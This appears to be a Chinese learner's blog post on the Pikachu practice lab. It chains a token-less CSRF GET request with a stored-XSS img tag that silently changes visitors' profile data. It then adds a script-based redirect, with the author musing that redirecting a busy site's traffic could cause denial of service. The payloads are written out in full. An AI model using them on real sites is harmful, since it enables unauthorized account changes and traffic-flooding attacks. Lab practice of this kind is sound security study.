xss与csrf组合拳加任意url跳转

学习笔记大佬勿喷 qq3661629617

这里用pikachu靶场来练习已知此处用xss漏洞和csrf漏洞简单弹个窗

d71651a6ef56412ab35acb11aae82d96.png

c8a72f54d80c443e94436af4038d08c7.png 

如何将他们结合呢 这里点击修改信息然后抓个包

9092a1ef19db4d5d9370995d6c3b4814.png 

可以发现这里没有任何类似token的校验get传输url这里根据数据包构造一下url

 127.0.0.1/pikachu/pikachu-master/vul/csrf/csrfget/csrf_get_edit.php?sex=kenny&phonenum=qq3661629617&add=qq3661629617&email=qqqq3661629617&submit=submit

 

 

直接访问这个url就可以直接修改上面的参数 经典的csrf 然后通过存储型xss的img标签来加载这段url 只要别人一访问就可以修改上面的信息

<img src="http://127.0.0.1/pikachu/pikachu-master/vul/csrf/csrfget/csrf_get_edit.php?sex=kenny&phonenum=qq3661629617&add=qq3661629617&email=qqqq3661629617&submit=submit

">

这里必须加上我们的协议我也是在这里踩坑了快半小时 幸好有大佬指导呜呜呜不加协议就会404

aef29392eb1842c5b3f12569c004405b.png

 如上图就是没加协议呜呜呜

现在加上协议后就可以成功结合我们的两个漏洞了

df963b9053884072935c75426731cccf.png

可以发现我们添加的js代码已经镶嵌在网页上 

57ea9149d3fd42978fcd23f9ad164b31.png 

9f2bef25d3b740c3aa182a4c21bde77b.png

刷新就可以自动加载我们构造的url可以看右下角成功修改

然后就是url跳转了 构思了一下假如一个流量很大的网站存在xss url跳转将跳转的网站设置为我们想要攻击的目标就会造成拒绝服务

<script>window.location.href='';</script>

在href后面添加url 插入框内刷新就会直接跳转到我们的url这里拿百度为例子

09e6e9c7ad9340c192f30c1cb13610be.png

可以看到也是成功跳转到百度 

  • 14
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值